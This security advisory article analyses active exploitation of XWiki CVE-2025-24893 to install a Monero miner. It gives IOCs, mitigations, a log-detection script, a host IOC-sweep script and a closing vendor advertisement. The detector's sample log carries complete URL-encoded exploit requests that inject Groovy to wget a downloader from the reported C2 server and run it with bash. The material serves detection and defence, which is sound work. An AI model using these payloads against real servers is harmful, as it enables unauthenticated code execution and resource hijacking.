
Critical XWiki Vulnerability Abused in the Wild for Cryptocurrency Mining


A critical remote code execution (RCE) vulnerability (CVE-2025-24893) in XWiki, a widely used open-source wiki platform, is being actively exploited in the wild to deploy cryptocurrency-mining malware on compromised servers. The flaw lets an unauthenticated attacker inject wiki macros into a search request and have the server execute arbitrary code; no credentials and no user interaction are needed.


Vulnerability Details

The root cause is a template injection flaw in the SolrSearch page that XWiki ships by default: the text parameter of a request to /xwiki/bin/get/Main/SolrSearch is rendered without being escaped, so an attacker can embed a {{groovy}} macro in it and have the server evaluate the Groovy script, which in turn runs system commands. The vulnerability intelligence firm VulnCheck reported active exploitation based on data from its Canary network, a set of internet-facing sensors that emulate vulnerable systems in order to capture real attacks.


The Two-Stage Exploitation Process

The exploitation unfolds in two distinct phases separated by roughly 20 minutes, a delay likely intended to evade sandboxes and detection rules that expect download and execution to happen in one burst:

  1. Initial Request: The attacker sends a URL-encoded GET request to the SolrSearch endpoint whose text parameter carries an {{async}}-wrapped {{groovy}} payload. The Groovy script runs wget to fetch a downloader script (x640) from a command-and-control (C2) server at 193[.]32[.]208[.]24:8080 and saves it as /tmp/11909 on the target; at this point the file is only written, not executed. The request carries a Firefox user agent so that it blends in with ordinary browser traffic.
  2. Second Request: About 20 minutes later, a second request of the same form executes the downloaded script by invoking bash on /tmp/11909. The downloader then fetches two further scripts, x521 and x522, from the same server and pipes each straight into bash, so the scripts themselves never land on disk.

These additional scripts perform the following actions:

  • x521: Creates working directories under /var/tmp, downloads the coinminer binary (tcrond) from the same C2 server, and marks it executable.
  • x522: Prepares the host by killing competing miners (such as xmrig and kinsing) so the new miner gets the whole CPU, clears the shell history, and then launches tcrond with a configuration pointing at the mining pool auto[.]c3pool[.]org on port 80, a port that egress filters commonly allow.

The miner itself, tcrond, is UPX-packed to hinder static analysis and is configured with a Monero wallet address that receives the payouts (c3pool is a Monero mining pool).
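The two-stage sequence above leaves a distinctive trail in the web server's access log: two requests to the SolrSearch endpoint from one source, about 20 minutes apart, whose text parameter decodes to wiki macros. The following detector is an added example written for this article, not code from VulnCheck or the XWiki project. The log lines it scans are constructed for the example (documentation IP ranges for the attacker, the C2 address from the report) and mirror the described sequence; the field names and the "20 minutes apart" correlation are this example's own choices.

```python
import re
from datetime import datetime
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log lines (combined log format) mirroring the sequence the
# write-up describes: a benign page view, the stage-one SolrSearch request, a
# legitimate search from someone else, and the stage-two request ~20 minutes later.
SAMPLE_LOG = """\
203.0.113.10 - - [29/Oct/2025:10:01:12 +0000] "GET /xwiki/bin/view/Main/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.10 - - [29/Oct/2025:10:01:40 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%22wget%20http%3A%2F%2F193.32.208.24%3A8080%2Fx640%20-O%20%2Ftmp%2F11909%22.execute%28%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D HTTP/1.1" 200 812 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
198.51.100.7 - - [29/Oct/2025:10:02:03 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=release%20notes HTTP/1.1" 200 2044 "-" "Mozilla/5.0"
203.0.113.10 - - [29/Oct/2025:10:21:58 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%22bash%20%2Ftmp%2F11909%22.execute%28%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D HTTP/1.1" 200 790 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# Script macros that have no business inside a search string.
MACRO_RE = re.compile(r"\{\{\s*/?(groovy|async|velocity|python)\b", re.I)
SHELL_RE = re.compile(r"\b(wget|curl|bash)\b")
C2_IP = "193.32.208.24"          # C2 address from the report
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"  # combined-log timestamp


def decoded_text_params(target):
    """All values of the `text` query parameter. parse_qs already URL-decodes
    once; the extra unquote defeats double-encoded payloads."""
    return [unquote(v) for v in parse_qs(urlsplit(target).query).get("text", [])]


def classify(line):
    """Return a hit dict for a suspicious SolrSearch request, else None."""
    m = LOG_RE.match(line)
    if not m or "/Main/SolrSearch" not in m.group("target"):
        return None
    texts = decoded_text_params(m.group("target"))
    reasons = set()
    for text in texts:
        if MACRO_RE.search(text):
            reasons.add("wiki macro in text parameter")
        if SHELL_RE.search(text):
            reasons.add("shell command in text parameter")
        if C2_IP in text:
            reasons.add("known C2 address")
    if not reasons:
        return None
    return {"ip": m.group("ip"), "ts": m.group("ts"), "ua": m.group("ua"),
            "reasons": sorted(reasons), "text": texts}


def scan(log_text):
    return [h for h in map(classify, log_text.splitlines()) if h]


def stage_timeline(hits):
    """Per source IP: number of hits and minutes between first and last.
    Two hits about 20 minutes apart from one IP is the reported pattern."""
    by_ip = {}
    for h in hits:
        t = datetime.strptime(h["ts"], TS_FMT)
        lo, hi, n = by_ip.get(h["ip"], (t, t, 0))
        by_ip[h["ip"]] = (min(lo, t), max(hi, t), n + 1)
    return {ip: {"requests": n, "gap_minutes": (hi - lo).total_seconds() / 60}
            for ip, (lo, hi, n) in by_ip.items()}


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for h in hits:
        print(h["ts"], h["ip"], ", ".join(h["reasons"]))
    print(stage_timeline(hits))
```

Run it against a real access log by replacing SAMPLE_LOG with the file contents. The macro check is the one that generalises: it fires on any CVE-2025-24893 attempt regardless of the second-stage payload, whereas the C2 address and the wget/bash strings only catch this particular campaign.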


Tactics, Techniques, and Procedures (TTPs)

Attackers are employing the following MITRE ATT&CK tactics and techniques, listed as tactic / technique pairs:

  • TA0001 Initial Access / T1190 Exploit Public-Facing Application: the unauthenticated SolrSearch request is the entry point.
  • TA0002 Execution / T1059 Command and Scripting Interpreter: Groovy on the server side, then bash for the downloaded scripts.
  • TA0003 Persistence / T1547 Boot or Logon Autostart Execution: the miner is configured to start again at boot or logon.
  • TA0005 Defense Evasion / T1027 Obfuscated Files or Information: the tcrond binary is UPX-packed; x522's clearing of the shell history additionally maps to T1070 Indicator Removal.
  • TA0011 Command and Control / T1071 Application Layer Protocol: all stages are fetched over HTTP from the C2 server on port 8080.
  • TA0040 Impact / T1496 Resource Hijacking: the server's CPU is used to mine Monero.

Indicators of Compromise (IOCs)

  • IP Addresses: 123[.]25[.]249[.]88 (Attacker, Vietnam), 193[.]32[.]208[.]24 (C2 Server)
  • File Hashes (SHA-1; the 40-character digests below are SHA-1, not SHA-256):
    • tcrond (packed): 0b907eee9a85d39f8f0d7c503cc1f84a71c4de10
    • tcrond (unpacked): 90d274c7600fbdca5fe035250d0baff20889ec2b
    • x521: de082aeb01d41dd81cfb79bc5bfa33453b0022ed
    • x522: 2abd6f68a24b0a5df5809276016e6b85c77e5f7f
    • x640: 5abc337dbc04fee7206956dad1e0b6d43921a868

Mitigation & Recommendations

To mitigate the risk posed by this vulnerability, organizations using XWiki should take the following steps:

  • Patch Immediately: CVE-2025-24893 is fixed in XWiki 15.10.11, 16.4.1 and 16.5.0 RC1; upgrade to 15.10.11 or later on the 15.x line, or to 16.4.1 or later on 16.x. Until the upgrade is done, do not expose the wiki to anonymous (guest) users, since the exploit needs no account.
  • Review Web Logs: Search access logs for requests to /xwiki/bin/get/Main/SolrSearch whose text parameter URL-decodes to wiki macros such as {{async}} or {{groovy}}; a legitimate search never contains them. Two such requests from one source about 20 minutes apart match the reported intrusion.
  • Monitor Outbound Traffic and Process Activity: An XWiki server has no reason to download files from the internet. Alert on the XWiki Java process spawning wget, curl or bash, and on outbound connections to 193[.]32[.]208[.]24:8080 or to auto[.]c3pool[.]org.
  • Scan for IOCs: Check /tmp and /var/tmp for /tmp/11909, tcrond and the hashes listed above, and look for an unexpected tcrond process consuming CPU. Treat any host with a match as compromised: the attacker had code execution as the XWiki service account, so rebuild the server rather than only removing the miner.
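A minimal host-side sweep for the IOC list above, as an added example written for this article and not a tool from VulnCheck, XWiki or the vendor. It hashes everything under /tmp and /var/tmp, looks for the pool and C2 strings (which survive a repack that would change every hash), flags UPX-packed ELF files, and checks the installed XWiki version against the fixed releases. The scan directories, the dry-run sample files and the function names are this example's own assumptions; the hashes, strings and paths come from the article.

```python
import hashlib
import os
import re
import tempfile

# SHA-1 digests from the IOC list above (40 hex characters, so SHA-1, not SHA-256).
IOC_SHA1 = {
    "0b907eee9a85d39f8f0d7c503cc1f84a71c4de10": "tcrond (packed)",
    "90d274c7600fbdca5fe035250d0baff20889ec2b": "tcrond (unpacked)",
    "de082aeb01d41dd81cfb79bc5bfa33453b0022ed": "x521",
    "2abd6f68a24b0a5df5809276016e6b85c77e5f7f": "x522",
    "5abc337dbc04fee7206956dad1e0b6d43921a868": "x640",
}
# Strings from the write-up. A repacked or re-keyed build changes every hash
# above but usually keeps the pool and C2 address.
IOC_STRINGS = [b"auto.c3pool.org", b"193.32.208.24"]
IOC_PATHS = ["/tmp/11909"]
SCAN_DIRS = ["/tmp", "/var/tmp"]  # where the downloader and x521 stage files (assumed)
MAX_READ = 64 * 1024 * 1024       # bytes per file searched for strings


def sha1_file(path):
    h = hashlib.sha1()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def scan_dir(root, hashes=IOC_SHA1, strings=IOC_STRINGS):
    """Return (path, kind, detail) findings for regular files under root."""
    findings = []
    for dirpath, _, names in os.walk(root):  # os.walk silently skips unreadable dirs
        for name in names:
            path = os.path.join(dirpath, name)
            if os.path.islink(path) or not os.path.isfile(path):
                continue
            try:
                digest = sha1_file(path)
                with open(path, "rb") as f:
                    head = f.read(MAX_READ)
            except OSError:
                continue  # vanished or unreadable; keep going
            if digest in hashes:
                findings.append((path, "hash", hashes[digest]))
            for s in strings:
                if s in head:
                    findings.append((path, "string", s.decode()))
            # UPX leaves a "UPX!" marker in the packed ELF; tcrond is UPX-packed.
            if head.startswith(b"\x7fELF") and b"UPX!" in head:
                findings.append((path, "upx-packed-elf", name))
    return findings


def existing_ioc_paths(paths=IOC_PATHS):
    return [p for p in paths if os.path.exists(p)]


# Fixed releases per the XWiki advisory for CVE-2025-24893: 15.10.11, 16.4.1, 16.5.0 RC1.
def parse_version(s):
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", s)
    if not m:
        raise ValueError("unrecognised XWiki version: %r" % s)
    return int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)


def is_vulnerable_version(s):
    v = parse_version(s)
    return v < (15, 10, 11) or (16, 0, 0) <= v < (16, 4, 1)


def build_sample_tree():
    """Constructed stand-ins for an offline dry run; not the real malware."""
    root = tempfile.mkdtemp(prefix="xwiki-ioc-")
    with open(os.path.join(root, "x522"), "wb") as f:
        f.write(b"#!/bin/bash\n./tcrond -o auto.c3pool.org:80\n")
    fake_elf = b"\x7fELF" + b"\x00" * 12 + b"UPX!" + b"\x00" * 32
    with open(os.path.join(root, "tcrond"), "wb") as f:
        f.write(fake_elf)
    return root, hashlib.sha1(fake_elf).hexdigest()


def self_check():
    """Scan the constructed tree, matching the fake ELF by its own hash."""
    root, fake_hash = build_sample_tree()
    hashes = dict(IOC_SHA1, **{fake_hash: "constructed sample"})
    return {(os.path.basename(p), kind, detail)
            for p, kind, detail in scan_dir(root, hashes=hashes)}


if __name__ == "__main__":
    for d in SCAN_DIRS:
        for finding in scan_dir(d):
            print("MATCH", *finding)
    for p in existing_ioc_paths():
        print("PATH", p)
```

Run it as root so /var/tmp subdirectories owned by the service account are readable. A hash match confirms this exact campaign; a string or UPX hit on an unknown file in a temp directory is weaker evidence and should be triaged by hand, since legitimate software is occasionally UPX-packed too.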

Instantly Fix Risks with Saner Patch Management

Saner patch management is a continuous, automated, and integrated software that instantly fixes risks exploited in the wild. The software supports major operating systems like Windows, Linux, and macOS, as well as 550+ third-party applications.

It also allows you to set up a safe testing area to test patches before deploying them in a primary production environment. Saner patch management additionally supports a patch rollback feature in case of patch failure or a system malfunction.

Experience the fastest and most accurate patching software here.